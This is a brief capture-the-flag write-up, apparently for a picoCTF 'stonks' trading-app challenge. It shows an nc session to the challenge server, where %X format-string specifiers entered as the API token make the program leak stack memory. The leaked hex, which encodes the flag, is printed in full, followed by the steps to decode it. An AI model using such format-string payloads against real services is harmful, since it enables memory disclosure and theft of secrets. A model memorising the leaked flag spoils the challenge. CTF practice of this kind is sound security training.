

nc mercury.picoc.tf.net 6989

Welcome back to the trading app!

What would you like to do?

1) Buy some stonks!

2) View my portfolio

1

Using patented AI algorithms to buy stonks

Stonks chosen

What is your API token?

%X
%X
%X

Buying stonks with token:

878B390804B00080489C3F7ED5D80FFFFFFFF18789160F7EE3110F7ED5DC70878A1801878B370878
B3906F6369707B465443306C5F49345F74356D5F6C6C306D5F795F79336E3538613032356533FF870
07DF7F10AF8F7EE3440931EE00010F7D72CE9F7EE40C0F7ED55C0F7ED5000FF87B308F7D6368DF7E
D55C08048ECAFF87B3140F7EF7F09804B000F7ED5000F7ED5E20FF87B348F7EFDD50F7ED6890931E
E000F7ED5000804B000FF87B3488048C868789160FF87B334FF87B3488048BE9F7ED53FC0FF87B3FC
FF87B3F4118789160931EE000FF87B36000F7D18FA1F7ED5000F7ED50000F7D18FA11FF87B3F4FF87
B3FCFF87B38410F7ED5000F7EF870AF7F100000F7ED500000D4FB4FD0788349C0000180486300

Portfolio as of Mon Apr 28 05:37:15 UTC 2025

1 shares of OOG

1 shares of UVZ

6 shares of KZZA

126 shares of M

119 shares of KL

Goodbye!

%X
%X
%X%

The required payload to access the memory location then we will get the api key which has to convert into hex to ascii cut the part of the flag then and then ascii to hex then use cyberchef to swap endianess and then hex to ascii and we will get the flag



